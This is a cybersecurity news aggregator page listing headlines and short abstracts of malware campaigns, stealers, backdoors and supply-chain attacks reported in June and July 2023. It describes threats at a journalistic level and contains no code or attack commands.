July 13, 2023
New Attack Drops LokiBot Malware via Malicious Macros in Word Documents Full Text
Abstract
FortiGuard Labs recently uncovered a concerning discovery in their investigation, revealing a series of malicious Microsoft Office documents designed to take advantage of well-known vulnerabilities.Cyware
July 11, 2023
New TOITOIN Trojan Targets LATAM Full Text
Abstract
Businesses in the Latin American region are facing a new threat from a sophisticated malicious campaign distributing the TOITOIN trojan. Moreover, the campaign uses Amazon EC2 instances to evade domain-based detections. It is crucial for organizations to maintain a high level of vigilance against e...Cyware
July 11, 2023
Purr-fectly Crafted for Macs: Charming Kitten Introduces NokNok Malware Full Text
Abstract
Security researchers uncovered a new campaign by Charming Kitten (APT42) targeting Windows and macOS systems using different malware payloads. A new type of malware called NokNok is specifically used for targeting macOS systems. For Windows, adversaries leverage PowerShell code and an LNK file to...Cyware
July 11, 2023
Six Malicious Python Packages in the PyPI Targeting Windows Users Full Text
Abstract
The attackers imitated the W4SP attack group by using custom entry points and leveraging free file hosting services to remain undetected during the installation or execution process.Cyware
July 10, 2023
VMware warns of exploit available for critical vRealize RCE bug Full Text
Abstract
VMware warned customers today that exploit code is now available for a critical vulnerability in the VMware Aria Operations for Logs analysis tool, which helps admins manage terabytes worth of app and infrastructure logs in large-scale environments.BleepingComputer
July 10, 2023
New TOITOIN Banking Trojan Targeting Latin American Businesses Full Text
Abstract
Businesses operating in the Latin American (LATAM) region are the target of a new Windows-based banking trojan called TOITOIN since May 2023. "This sophisticated campaign employs a trojan that follows a multi-staged infection chain, utilizing specially crafted modules throughout each stage," Zscaler researchers Niraj Shivtarkar and Preet Kamal said in a report published last week. "These modules are custom designed to carry out malicious activities, such as injecting harmful code into remote processes, circumventing User Account Control via COM Elevation Moniker, and evading detection by Sandboxes through clever techniques like system reboots and parent process checks." The six-stage endeavor has all the hallmarks of a well-crafted attack sequence, beginning with a phishing email containing an embedded link that points to a ZIP archive hosted on an Amazon EC2 instance to evade domain-based detections. The email messages leverage an invoice-themed lure to tThe Hacker News
July 9, 2023
Two spyware sending data of more than 1.5M users to China were found in Google Play Store Full Text
Abstract
Two apps on the Google Play Store with more than 1.5 million downloads have been discovered spying on users and sending data to China. Researchers from cybersecurity firm Pradeo discovered two malicious apps on Google Play hiding spyware and spying...Security Affairs
July 8, 2023
WISE REMOTE Stealer Unleashed : Unveiling Its Multifaceted Malicious Arsenal Full Text
Abstract
The WISE REMOTE Stealer is an advanced information stealer and Remote Access Trojan (RAT) that is coded in the Go programming language and utilizes code manipulation techniques to evade antivirus detection, making it difficult to detect and mitigate.Cyware
July 07, 2023
Cybersecurity Agencies Sound Alarm on Rising TrueBot Malware Attacks Full Text
Abstract
Cybersecurity agencies have warned about the emergence of new variants of the TrueBot malware. This enhanced threat is now targeting companies in the U.S. and Canada with the intention of extracting confidential data from infiltrated systems. These sophisticated attacks exploit a critical vulnerability (CVE-2022-31199) in the widely used Netwrix Auditor server and its associated agents. This vulnerability enables unauthorized attackers to execute malicious code with the SYSTEM user's privileges, granting them unrestricted access to compromised systems. The TrueBot malware, linked with cybercriminal collectives Silence and FIN11, is deployed to siphon off data and disseminate ransomware, jeopardising the safety of numerous infiltrated networks. The cybercriminals gain their initial foothold by exploiting the cited vulnerability, then proceed to install TrueBot. Once they have breached the networks, they install the FlawedGrace Remote Access Trojan (RAT) to escalate their pThe Hacker News
July 6, 2023
TeamsPhisher Tool Exploits Microsoft Teams to Deploy Malware Full Text
Abstract
A new tool available on GitHub can enable attackers to misuse a recently disclosed vulnerability in Microsoft Teams and automatically deliver malicious files to users' systems.Cyware
July 06, 2023
Iranian Hackers’ Sophisticated Malware Targets Windows and macOS Users Full Text
Abstract
The Iranian nation-state actor known as TA453 has been linked to a new set of spear-phishing attacks that infect both Windows and macOS operating systems with malware. "TA453 eventually used a variety of cloud hosting providers to deliver a novel infection chain that deploys the newly identified PowerShell backdoor GorjolEcho," Proofpoint said in a new report. "When given the opportunity, TA453 ported its malware and attempted to launch an Apple flavored infection chain dubbed NokNok. TA453 also employed multi-persona impersonation in its unending espionage quest." TA453, also known by the names APT35, Charming Kitten, Mint Sandstorm, and Yellow Garuda, is a threat group linked to Iran's Islamic Revolutionary Guard Corps (IRGC) that has been active since at least 2011. Most recently, Volexity highlighted the adversary's use of an updated version of a PowerShell implant called CharmPower (aka GhostEcho or POWERSTAR). In the attack sequence discoveThe Hacker News
July 5, 2023
RedEnergy Stealer-as-a-Ransomware employed in attacks in the wild Full Text
Abstract
RedEnergy is a sophisticated stealer-as-a-ransomware that was employed in attacks targeting energy utilities, oil, gas, telecom, and machinery sectors. Zscaler ThreatLabz researchers discovered a new Stealer-as-a-Ransomware named RedEnergy used in attacks...Security Affairs
July 05, 2023
Node.js Users Beware: Manifest Confusion Attack Opens Door to Malware Full Text
Abstract
The npm registry for the Node.js JavaScript runtime environment is susceptible to what's called a manifest confusion attack that could potentially allow threat actors to conceal malware in project dependencies or perform arbitrary script execution during installation. "A npm package's manifest is published independently from its tarball," Darcy Clarke, a former GitHub and npm engineering manager, said in a technical write-up published last week. "Manifests are never fully validated against the tarball's contents." "The ecosystem has broadly assumed the contents of the manifest and tarball are consistent," Clarke added. The problem, at its core, stems from the fact that the manifest and package metadata are decoupled and that they are never cross-referenced against one another, thereby leading to unexpected behavior and misuse when there is a mismatch. As a result, a threat actor could exploit this loophole to publish a module with a maThe Hacker News
July 5, 2023
NoName(057)16’s DDoSia Project gets an upgrade Full Text
Abstract
The DDoSia attack tool received an upgrade: it now supports a new security mechanism to conceal the list of targets. Researchers at the cybersecurity firm Sekoia analyzed an updated variant of the DDoSia attack tool that was developed and used by the pro-Russia...Security Affairs
July 4, 2023
New Malware Alert: EarlyRAT Linked to North Korean Hacking Group Full Text
Abstract
EarlyRAT is a straightforward program that immediately starts gathering system data and sending it via a POST request to the C2 server. The execution of commands on the infected system is EarlyRAT’s second main purpose.Cyware
July 03, 2023
Evasive Meduza Stealer Targets 19 Password Managers and 76 Crypto Wallets Full Text
Abstract
In yet another sign of a lucrative crimeware-as-a-service (CaaS) ecosystem, cybersecurity researchers have discovered a new Windows-based information stealer called Meduza Stealer that's actively being developed by its author to evade detection by software solutions. "The Meduza Stealer has a singular objective: comprehensive data theft," Uptycs said in a new report. "It pilfers users' browsing activities, extracting a wide array of browser-related data." "From critical login credentials to the valuable record of browsing history and meticulously curated bookmarks, no digital artifact is safe. Even crypto wallet extensions, password managers, and 2FA extensions are vulnerable." Despite the similarity in features, Meduza boasts of a "crafty" operational design that eschews the use of obfuscation techniques and promptly terminates its execution on compromised hosts should a connection to the attacker's server fail. It'sThe Hacker News
July 3, 2023
New Windows Meduza Stealer targets tens of crypto wallets and password managers Full Text
Abstract
Researchers spotted a new Windows information stealer called Meduza Stealer, whose authors employ sophisticated marketing strategies to promote it. The Meduza Stealer can steal browsing activities and extract a wide array of browser-related data, including...Security Affairs
July 3, 2023
Experts detected a new variant of North Korea-linked RUSTBUCKET macOS malware Full Text
Abstract
Researchers spotted a new version of the RustBucket Apple macOS malware that supports enhanced capabilities. Researchers from the Elastic Security Labs have spotted a new variant of the RustBucket Apple macOS malware. In April, the security firm...Security Affairs
July 01, 2023
Beware: New ‘RustBucket’ Malware Variant Targeting macOS Users Full Text
Abstract
Researchers have pulled back the curtain on an updated version of an Apple macOS malware called RustBucket that comes with improved capabilities to establish persistence and avoid detection by security software. "This variant of RustBucket, a malware family that targets macOS systems, adds persistence capabilities not previously observed," Elastic Security Labs researchers said in a report published this week, adding it's "leveraging a dynamic network infrastructure methodology for command-and-control." RustBucket is the work of a North Korean threat actor known as BlueNoroff, which is part of a larger intrusion set tracked under the name Lazarus Group, an elite hacking unit supervised by the Reconnaissance General Bureau (RGB), the country's primary intelligence agency. The malware came to light in April 2023, when Jamf Threat Labs described it as an AppleScript-based backdoor capable of retrieving a second-stage payload from a remote server. ElasThe Hacker News
June 29, 2023
Fluhorse: Flutter-Based Android Malware Targets Credit Cards and 2FA Codes Full Text
Abstract
Cybersecurity researchers have shared the inner workings of an Android malware family called Fluhorse. The malware "represents a significant shift as it incorporates the malicious components directly within the Flutter code," Fortinet FortiGuard Labs researcher Axelle Apvrille said in a report published last week. Fluhorse was first documented by Check Point in early May 2023, detailing its attacks on users located in East Asia through rogue apps masquerading as ETC and VPBank Neo, which are popular in Taiwan and Vietnam. The initial intrusion vector for the malware is phishing. The ultimate goal of the app is to steal credentials, credit card details, and two-factor authentication (2FA) codes received as SMS to a remote server under the control of the threat actors. The latest findings from Fortinet, which reverse-engineered a Fluhorse sample uploaded to VirusTotal on June 11, 2023, suggest that the malware has evolved, incorporating additional sophistication bThe Hacker News
June 29, 2023
Previously undetected ThirdEye malware appears in the threat landscape Full Text
Abstract
A new Windows information stealer dubbed ThirdEye has appeared in the threat landscape; it has been active since April. Fortinet FortiGuard Labs discovered a previously undetected information stealer named ThirdEye. The malicious code is not sophisticated...Security Affairs
June 29, 2023
Newly Uncovered ThirdEye Windows-Based Malware Steals Sensitive Data Full Text
Abstract
A previously undocumented Windows-based information stealer called ThirdEye has been discovered in the wild with capabilities to harvest sensitive data from infected hosts. Fortinet FortiGuard Labs, which made the discovery, said it found the malware in an executable that masqueraded as a PDF file with a Russian name "CMK Правила оформления больничных листов.pdf.exe," which translates to "CMK Rules for issuing sick leaves.pdf.exe." The arrival vector for the malware is presently unknown, although the nature of the lure points to it being used in a phishing campaign. The very first ThirdEye sample was uploaded to VirusTotal on April 4, 2023, with relatively fewer features. The evolving stealer, like other malware families of its kind, is equipped to gather system metadata, including BIOS release date and vendor, total/free disk space on the C drive, currently running processes, registered usernames, and volume information. The amassed details are then traThe Hacker News
June 28, 2023
Infectious NPM and PyPI Packages Raise Fresh Supply Chain Concerns Full Text
Abstract
Security researchers have laid bare an ongoing attack campaign that specifically targets the npm ecosystem via a pair of malicious packages. Meanwhile, another researcher group reported seven malicious PyPI packages. Developers, package maintainers, and users must remain diligent in verifying the i...Cyware
June 27, 2023
New Mockingjay process injection technique evades EDR detection Full Text
Abstract
A new process injection technique named 'Mockingjay' could allow threat actors to bypass EDR (Endpoint Detection and Response) and other security products to stealthily execute malicious code on compromised systems.BleepingComputer
June 27, 2023
Hackers Steal Messages, Call Logs, and Locations Intercepted by Phone Monitoring App Full Text
Abstract
The phone monitoring app, which is used to spy on thousands of people using Android phones, said in a notice on its login page that on June 21, “a security incident occurred involving obtaining unauthorized access to the data of website users.”Cyware
June 27, 2023
New Mockingjay Process Injection Technique Could Let Malware Evade Detection Full Text
Abstract
A new process injection technique dubbed Mockingjay could be exploited by threat actors to bypass security solutions to execute malicious code on compromised systems. "The injection is executed without space allocation, setting permissions or even starting a thread," Security Joes researchers Thiago Peixoto, Felipe Duarte, and Ido Naor said in a report shared with The Hacker News. "The uniqueness of this technique is that it requires a vulnerable DLL and copying code to the right section." Process injection is an attack method that allows adversaries to inject code into processes in order to evade process-based defenses and elevate privileges. In doing so, it could allow for the execution of arbitrary code in the memory space of a separate live process. Some of the well-known process injection techniques include dynamic link library (DLL) injection, portable executable injection, thread execution hijacking, process hollowing, and process doppelgänging, amonThe Hacker News
June 27, 2023
Mockingjay process injection technique allows EDR bypass Full Text
Abstract
Mockingjay is a new process injection technique that can be exploited to bypass security solutions to execute malware on compromised systems. A new process injection technique dubbed Mockingjay can be exploited by attackers to bypass security controls...Security Affairs
June 27, 2023
Anatsa Banking Trojan Targeting Users in US, UK, Germany, Austria, and Switzerland Full Text
Abstract
A new Android malware campaign has been observed pushing the Anatsa banking trojan to target banking customers in the U.S., U.K., Germany, Austria, and Switzerland since the start of March 2023. "The actors behind Anatsa aim to steal credentials used to authorize customers in mobile banking applications and perform Device-Takeover Fraud (DTO) to initiate fraudulent transactions," ThreatFabric said in an analysis published Monday. The Dutch cybersecurity company said Anatsa-infected Google Play Store dropper apps have accrued over 30,000 installations to date, indicating that the official app storefront has become an effective distribution vector for the malware. Anatsa, also known by the name TeaBot and Toddler, first emerged in early 2021, and has been observed masquerading as seemingly innocuous utility apps like PDF readers, QR code scanners, and two-factor authentication (2FA) apps on Google Play to siphon users' credentials. It has since become one oThe Hacker News
June 26, 2023
Trojanized Super Mario Bros game spreads malware Full Text
Abstract
Researchers observed threat actors spreading a trojanized Super Mario Bros game installer to deliver multiple malware. Researchers from Cyble Research and Intelligence Labs (CRIL) discovered a trojanized Super Mario Bros game installer for Windows...Security Affairs
June 23, 2023
Powerful JavaScript Dropper PindOS Distributes Bumblebee and IcedID Malware Full Text
Abstract
A new strain of JavaScript dropper has been observed delivering next-stage payloads like Bumblebee and IcedID. Cybersecurity firm Deep Instinct is tracking the malware as PindOS, which contains the name in its "User-Agent" string. Both Bumblebee and IcedID serve as loaders, acting as a vector for other malware on compromised hosts, including ransomware. A recent report from Proofpoint highlighted IcedID's abandoning of banking fraud features to solely focus on malware delivery. Bumblebee, notably, is a replacement for another loader called BazarLoader, which has been attributed to the now-defunct TrickBot and Conti groups. A report from Secureworks in April 2022 found evidence of collaboration between several actors in the Russian cybercrime ecosystem, including that of Conti, Emotet, and IcedID. Deep Instinct's source code analysis of PindOS shows that it contains comments in Russian, raising the possibility of a continued partnership betweenThe Hacker News
June 22, 2023
Researchers Reverse Engineer Flutter-based Fluhorse Android Malware Full Text
Abstract
The malware poses as a legitimate app for an electronic toll system used in Southern Asia and steals user credentials and 2FA codes. The malware is distributed via email phishing campaigns and has been downloaded over 100,000 times.Cyware
June 22, 2023
Researchers released a PoC exploit for CVE-2023-20178 flaw in Cisco AnyConnect Secure Full Text
Abstract
The proof-of-concept (PoC) exploit code for the high-severity vulnerability (CVE-2023-20178) in Cisco AnyConnect Secure was published online. A security researcher has published proof-of-concept (PoC) exploit code for the high-severity vulnerability,...Security Affairs
June 22, 2023
Analyzing the TriangleDB implant used in Operation Triangulation Full Text
Abstract
Kaspersky provided more details about Operation Triangulation, including the exploitation chain and the implant used by the threat actors. Kaspersky researchers dug into Operation Triangulation and discovered more details about the exploit chain employed...Security Affairs
June 22, 2023
RDStealer Compromises Remote Desktop Drives for Data Theft Full Text
Abstract
Researchers took the wraps off of a year-long cyberattack campaign deploying a custom Golang malware called RDStealer. The malware strain focuses on stealing credentials and extracting data from compromised hosts. It is no coincidence that all the compromised machines were Dell-manufactured devices.Cyware
June 21, 2023
New Report Exposes Operation Triangulation’s Spyware Implant Targeting iOS Devices Full Text
Abstract
More details have emerged about the spyware implant that's delivered to iOS devices as part of a campaign called Operation Triangulation. Kaspersky, which discovered the operation after becoming one of the targets at the start of the year, said the malware has a lifespan of 30 days, after which it gets automatically uninstalled unless the time period is extended by the attackers. The Russian cybersecurity company has codenamed the backdoor TriangleDB. "The implant is deployed after the attackers obtain root privileges on the target iOS device by exploiting a kernel vulnerability," Kaspersky researchers said in a new report published today. "It is deployed in memory, meaning that all traces of the implant are lost when the device gets rebooted. Therefore, if the victim reboots their device, the attackers have to reinfect it by sending an iMessage with a malicious attachment, thus launching the whole exploitation chain again." Operation TriangulationThe Hacker News
June 21, 2023
New Condi Malware Hijacking TP-Link Wi-Fi Routers for DDoS Botnet Attacks Full Text
Abstract
A new malware called Condi has been observed exploiting a security vulnerability in TP-Link Archer AX21 (AX1800) Wi-Fi routers to rope the devices into a distributed denial-of-service (DDoS) botnet. Fortinet FortiGuard Labs said the campaign has ramped up since the end of May 2023. Condi is the work of a threat actor who goes by the online alias zxcr9999 on Telegram and runs a Telegram channel called Condi Network to advertise their warez. "The Telegram channel was started in May 2022, and the threat actor has been monetizing its botnet by providing DDoS-as-a-service and selling the malware source code," security researchers Joie Salvio and Roy Tay said. An analysis of the malware artifact reveals its ability to terminate other competing botnets on the same host. It, however, lacks a persistence mechanism, meaning the program cannot survive a system reboot. To get around this limitation, the malware deletes multiple binaries that are used to shut down or reboot theThe Hacker News
June 20, 2023
Inside of the WASP’s nest: deep dive into PyPI-hosted malware Full Text
Abstract
VirusTotal experts identified a number of specific PyPI-based malware campaigns, including Discord Token Grabber V2, Hazard Token Grabber V2, Chromium Stealer, and W4SP Stealer (with Hyperion obfuscator).Cyware
June 20, 2023
Rogue Android Apps Target Pakistani Individuals in Sophisticated Espionage Campaign Full Text
Abstract
Individuals in the Pakistan region have been targeted using two rogue Android apps available on the Google Play Store as part of a new targeted campaign. Cybersecurity firm Cyfirma attributed the campaign with moderate confidence to a threat actor known as DoNot Team, which is also tracked as APT-C-35 and Viceroy Tiger. The espionage activity involves duping Android smartphone owners into downloading a program that's used to extract contact and location data from unwitting victims. "The motive behind the attack is to gather information via the stager payload and use the gathered information for the second-stage attack, using malware with more destructive features," the company said. DoNot Team is a suspected India-nexus threat actor that has a reputation for carrying out attacks against various countries in South Asia. It has been active since at least 2016. While an October 2021 report from Amnesty International linked the group's attack infrastructure toThe Hacker News
June 19, 2023
New Mystic Stealer Malware Targets 40 Web Browsers and 70 Browser Extensions Full Text
Abstract
A new information-stealing malware called Mystic Stealer has been found to steal data from about 40 different web browsers and over 70 web browser extensions. First advertised on April 25, 2023, for $150 per month, the malware also targets cryptocurrency wallets, Steam, and Telegram, and employs extensive mechanisms to resist analysis. "The code is heavily obfuscated making use of polymorphic string obfuscation, hash-based import resolution, and runtime calculation of constants," InQuest and Zscaler researchers said in an analysis published last week. Mystic Stealer, like many other crimeware solutions that are offered for sale, focuses on pilfering data and is implemented in the C programming language. The control panel has been developed using Python. Updates to the malware in May 2023 incorporate a loader component that allows it to retrieve and execute next-stage payloads fetched from a command-and-control (C2) server, making it a more formidable threat. C2 coThe Hacker News
June 19, 2023
Experts found components of a complex toolkit employed in macOS attacks Full Text
Abstract
Researchers uncovered a set of malicious files with backdoor capabilities that they believe is part of a toolkit targeting Apple macOS systems. Bitdefender researchers discovered a set of malicious files with backdoor capabilities that are suspected...Security Affairs
June 19, 2023
DcRAT Malware Distributed Using Explicit Lures of OnlyFans Full Text
Abstract
The DcRAT malware is being distributed using explicit lures for OnlyFans pages and other adult content. DcRAT offers multiple methods of monetizing infected systems, including file stealing, credential theft, and ransomware.Cyware
June 19, 2023
Researchers Discover New Sophisticated Toolkit Targeting Apple macOS Systems Full Text
Abstract
Cybersecurity researchers have uncovered a set of malicious artifacts that they say is part of a sophisticated toolkit targeting Apple macOS systems. "As of now, these samples are still largely undetected and very little information is available about any of them," Bitdefender researchers Andrei Lapusneanu and Bogdan Botezatu said in a preliminary report published on Friday. The Romanian firm's analysis is based on an examination of four samples that were uploaded to VirusTotal by an unnamed victim. The earliest sample dates back to April 18, 2023. Two of the three malicious programs are said to be generic Python-based backdoors that are designed to target Windows, Linux, and macOS systems. The payloads have been collectively dubbed JokerSpy. The first constituent is shared.dat, which, once launched, runs an operating system check (0 for Windows, 1 for macOS, and 2 for Linux) and establishes contact with a remote server to fetch additional instructions for executThe Hacker News
June 16, 2023
ChamelDoH: New Linux Backdoor Utilizing DNS-over-HTTPS Tunneling for Covert CnC Full Text
Abstract
The threat actor known as ChamelGang has been observed using a previously undocumented implant to backdoor Linux systems, marking a new expansion of the threat actor's capabilities. The malware, dubbed ChamelDoH by Stairwell, is a C++-based tool for communicating via DNS-over-HTTPS (DoH) tunneling. ChamelGang was first outed by Russian cybersecurity firm Positive Technologies in September 2021, detailing its attacks on fuel, energy, and aviation production industries in Russia, the U.S., India, Nepal, Taiwan, and Japan. Attack chains mounted by the actor have leveraged vulnerabilities in Microsoft Exchange servers and Red Hat JBoss Enterprise Application to gain initial access and carry out data theft attacks using a passive backdoor called DoorMe. "This is a native IIS module that is registered as a filter through which HTTP requests and responses are processed," Positive Technologies said at the time. "Its principle of operation is unusual: the backThe Hacker News
June 16, 2023
Balada Injector Campaign Hacks WordPress Sites Using Unpatched Plugins Full Text
Abstract
Balada leverages functions written in the Go language to spread itself and maintain persistence by executing a series of attacks, cross-site infections, and installation of backdoors.Cyware
June 16, 2023
Updated Android spyware GravityRAT steals WhatsApp Backups Full Text
Abstract
An updated version of the Android remote access trojan GravityRAT can steal WhatsApp backup files and can delete files. ESET researchers discovered an updated version of Android GravityRAT spyware that steals WhatsApp backup files and can delete files....Security Affairs
June 15, 2023
SeroXen Incorporates Latest BatCloak Engine Iteration Full Text
Abstract
SeroXen malware uses advanced, fully undetectable (FUD) techniques to infect victims with hVNC-capable malware. The malware uses highly obfuscated batch files as the loading mechanism, utilizing the BatCloak obfuscation engine.Cyware
June 15, 2023
Vidar Malware Using New Tactics to Evade Detection and Anonymize Activities Full Text
Abstract
The threat actors behind the Vidar malware have made changes to their backend infrastructure, indicating attempts to retool and conceal their online trail in response to public disclosures about their modus operandi. "Vidar threat actors continue to rotate their backend IP infrastructure, favoring providers in Moldova and Russia," cybersecurity company Team Cymru said in a new analysis shared with The Hacker News. Vidar is a commercial information stealer that's known to be active since late 2018. It's also a fork of another stealer malware called Arkei and is offered for sale between $130 and $750 depending on the subscription tier. Typically delivered through phishing campaigns and sites advertising cracked software, the malware comes with a wide range of capabilities to harvest sensitive information from infected hosts. Vidar has also been observed to be distributed via rogue Google Ads and a malware loader dubbed Bumblebee. Team Cymru, in a reportThe Hacker News
June 15, 2023
Android Spyware GravityRAT Goes After WhatsApp Backups Full Text
Abstract
The BingeChat campaign is ongoing and the spyware can exfiltrate WhatsApp backups and receive commands to delete files. The actor behind GravityRAT remains unknown, and the group is tracked internally as SpaceCobra.Cyware
June 15, 2023
Warning: GravityRAT Android Trojan Steals WhatsApp Backups and Deletes Files Full Text
Abstract
An updated version of an Android remote access trojan dubbed GravityRAT has been found masquerading as messaging apps BingeChat and Chatico as part of a narrowly targeted campaign since June 2022. "Notable in the newly discovered campaign, GravityRAT can exfiltrate WhatsApp backups and receive commands to delete files," ESET researcher Lukáš Štefanko said in a new report published today. "The malicious apps also provide legitimate chat functionality based on the open-source OMEMO Instant Messenger app." GravityRAT is the name given to a cross-platform malware that's capable of targeting Windows, Android, and macOS devices. The Slovak cybersecurity firm is tracking the activity under the name SpaceCobra. The threat actor is suspected to be based in Pakistan, with recent attacks involving GravityRAT targeting military personnel in India and among the Pakistan Air Force by camouflaging it as cloud storage and entertainment apps, as disclosed by MetaThe Hacker News
June 14, 2023
Deep dive into the Pikabot cyber threat Full Text
Abstract
Pikabot operates as a backdoor, enabling remote access to compromised systems, and receives commands from a C2 server. It uses anti-analysis techniques and deploys an injector to run tests before injecting its core module into a specified process.Cyware
June 14, 2023
New PikaBot Trojan Executes Diverse Range of Commands Full Text
Abstract
Researchers have dissected a new modular malware trojan, dubbed Pikabot, that can execute a diverse range of malicious commands. The trojan self-terminates if the system’s language is Georgian, Kazakh, Uzbek, or Tajik. To stay safe, organizations must deploy the necessary detection tools to root o...Cyware
June 14, 2023
New Golang-based Skuld Malware Stealing Discord and Browser Data from Windows PCs Full Text
Abstract
A new Golang-based information stealer called Skuld has compromised Windows systems across Europe, Southeast Asia, and the U.S. "This new malware strain tries to steal sensitive information from its victims," Trellix researcher Ernesto Fernández Provecho said in a Tuesday analysis. "To accomplish this task, it searches for data stored in applications such as Discord and web browsers; information from the system and files stored in the victim's folders." Skuld, which shares overlaps with publicly available stealers like Creal Stealer, Luna Grabber, and BlackCap Grabber, is the handiwork of a developer who goes by the online alias Deathined on various social media platforms like GitHub, Twitter, Reddit, and Tumblr. Also spotted by Trellix is a Telegram group named deathinews, indicating that these online avenues could be used to promote the offering in the future as a service for other threat actors. The malware, upon execution, checks if it'sThe Hacker News
June 14, 2023
Fake Researcher Profiles Spread Malware through GitHub Repositories as PoC Exploits Full Text
Abstract
At least half a dozen GitHub accounts from fake researchers associated with a fraudulent cybersecurity company have been observed pushing malicious repositories on the code hosting service. All seven repositories, which are still available as of writing, claim to be a proof-of-concept (PoC) exploit for purported zero-day flaws in Discord, Google Chrome, and Microsoft Exchange Server. VulnCheck, which discovered the activity, said, "the individuals creating these repositories have put significant effort into making them look legitimate by creating a network of accounts and Twitter profiles, pretending to be part of a non-existent company called High Sierra Cyber Security." The cybersecurity firm said it first came across the rogue repositories in early May when they were observed releasing similar PoC exploits for zero-day bugs in Signal and WhatsApp. The two repositories have since been taken down. Besides sharing some of the purported findings on Twitter in an attemThe Hacker News
June 14, 2023
LLM meets Malware: Starting the Era of Autonomous Threat Full Text
Abstract
Malware researchers analyzed the application of Large Language Models (LLM) to malware automation, investigating future abuse in autonomous threats. Executive Summary: In this report we shared some insight that emerged during our exploratory research,...Security Affairs
June 14, 2023
BatCloak: Obfuscation Solution Outwitting 80% of AV Engines Full Text
Abstract
Trend Micro cautioned about the utilization of BatCloak, a tool designed to obfuscate batch files and evade antivirus detection engines with an 80% success rate. This ongoing research showcases the continuous evolution of the BatCloak engine, aiming to achieve compatibility with a wide range of mal...Cyware
June 13, 2023
Beware: New DoubleFinger Loader Targets Cryptocurrency Wallets with Stealer Full Text
Abstract
A novel multi-stage loader called DoubleFinger has been observed delivering a cryptocurrency stealer dubbed GreetingGhoul in what's an advanced attack targeting users in Europe, the U.S., and Latin America. "DoubleFinger is deployed on the target machine, when the victim opens a malicious PIF attachment in an email message, ultimately executing the first of DoubleFinger's loader stages," Kaspersky researcher Sergey Lozhkin said in a Monday report. The starting point of the attacks is a modified version of espexe.exe – which refers to Microsoft Windows Economical Service Provider application – that's engineered to execute shellcode responsible for retrieving a PNG image file from the image hosting service Imgur. The image employs steganographic trickery to conceal an encrypted payload that triggers a four-stage compromise chain which eventually culminates in the execution of the GreetingGhoul stealer on the infected host. A notable aspect of GreetingGhoThe Hacker News
June 13, 2023
SPECTRALVIPER Backdoor Focuses on Vietnamese Public Companies
Abstract
Vietnamese public companies have been targeted by the SPECTRALVIPER backdoor in an ongoing campaign. The backdoor, a previously undisclosed x64 variant, offers various capabilities including file manipulation, token impersonation, and PE loading. SPECTRALVIPER can be compiled as an executable o... (Cyware)
June 12, 2023
FUD Malware obfuscation engine BatCloak continues to evolve
Abstract
Researchers detailed a fully undetectable (FUD) malware obfuscation engine named BatCloak that is used by threat actors. Researchers from Trend Micro have analyzed BatCloak, a fully undetectable (FUD) malware obfuscation engine used by threat... (Security Affairs)
June 10, 2023
New SPECTRALVIPER Backdoor Targeting Vietnamese Public Companies
Abstract
Vietnamese public companies have been targeted as part of an ongoing campaign that deploys a novel backdoor called SPECTRALVIPER. "SPECTRALVIPER is a heavily obfuscated, previously undisclosed, x64 backdoor that brings PE loading and injection, file upload and download, file and directory manipulation, and token impersonation capabilities," Elastic Security Labs said in a Friday report. The attacks have been attributed to an actor it tracks as REF2754, which overlaps with a Vietnamese threat group known as APT32, Canvas Cyclone (formerly Bismuth), Cobalt Kitty, and OceanLotus. Meta, in December 2020, linked the activities of the hacking crew to a cybersecurity company named CyberOne Group. In the latest infection flow unearthed by Elastic, the SysInternals ProcDump utility is leveraged to load an unsigned DLL file that contains DONUTLOADER, which, in turn, is configured to load SPECTRALVIPER and other malware such as P8LOADER or POWERSEAL. SPECTRALVIPER is desi... (The Hacker News)
June 9, 2023
Stealth Soldier backdoor used in targeted espionage attacks in Libya
Abstract
Researchers detected a cyberespionage campaign in Libya that employs a new custom, modular backdoor dubbed Stealth Soldier. Experts at the Check Point Research team uncovered a series of highly-targeted espionage attacks in Libya that employ a new custom... (Security Affairs)
June 09, 2023
Stealth Soldier: A New Custom Backdoor Targets North Africa with Espionage Attacks
Abstract
A new custom backdoor dubbed Stealth Soldier has been deployed as part of a set of highly-targeted espionage attacks in North Africa. "Stealth Soldier malware is an undocumented backdoor that primarily operates surveillance functions such as file exfiltration, screen and microphone recording, keystroke logging and stealing browser information," cybersecurity company Check Point said in a technical report. The ongoing operation is characterized by the use of command-and-control (C&C) servers that mimic sites belonging to the Libyan Ministry of Foreign Affairs. The earliest artifacts associated with the campaign date back to October 2022. The attacks commence with potential targets downloading bogus downloader binaries that are delivered via social engineering attacks and act as a conduit for retrieving Stealth Soldier, while simultaneously displaying a decoy empty PDF file. The custom modular implant, which is believed to be used sparingly, enables surveillance c... (The Hacker News)
June 07, 2023
New PowerDrop Malware Targeting U.S. Aerospace Industry
Abstract
An unknown threat actor has been observed targeting the U.S. aerospace industry with a new PowerShell-based malware called PowerDrop. "PowerDrop uses advanced techniques to evade detection such as deception, encoding, and encryption," according to Adlumin, which found the malware implanted in an unnamed domestic aerospace defense contractor in May 2023. "The name is derived from the tool, Windows PowerShell, used to concoct the script, and 'Drop' from the DROP (DRP) string used in the code for padding." PowerDrop is also a post-exploitation tool, meaning it's designed to gather information from victim networks after obtaining initial access through other means. The malware employs Internet Control Message Protocol (ICMP) echo request messages as beacons to initiate communications with a command-and-control (C2) server. The server, for its part, responds back with an encrypted command that's decoded and run on the compromised host. A similar... (The Hacker News)
June 7, 2023
New PowerDrop malware targets U.S. aerospace defense industry
Abstract
A previously unknown threat actor has been observed targeting the U.S. aerospace defense sector with a new PowerShell malware dubbed PowerDrop. Researchers from the Adlumin Threat Research discovered a new malicious PowerShell script, dubbed PowerDrop,... (Security Affairs)
June 06, 2023
New Malware Campaign Leveraging Satacom Downloader to Steal Cryptocurrency
Abstract
A recent malware campaign has been found to leverage Satacom downloader as a conduit to deploy stealthy malware capable of siphoning cryptocurrency using a rogue extension for Chromium-based browsers. "The main purpose of the malware that is dropped by the Satacom downloader is to steal BTC from the victim's account by performing web injections into targeted cryptocurrency websites," Kaspersky researchers Haim Zigel and Oleg Kupreev said. Targets of the campaign include Coinbase, Bybit, KuCoin, Huobi, and Binance users primarily located in Brazil, Algeria, Turkey, Vietnam, Indonesia, India, Egypt, and Mexico. Satacom downloader, also called Legion Loader, first emerged in 2019 as a dropper for next-stage payloads, including information stealers and cryptocurrency miners. Infection chains involving the malware begin when users searching for cracked software are redirected to bogus websites that host ZIP archive files containing the malware. "Various types... (The Hacker News)
June 3, 2023
DogeRAT Malware Eyes Banking and Entertainment Sectors
Abstract
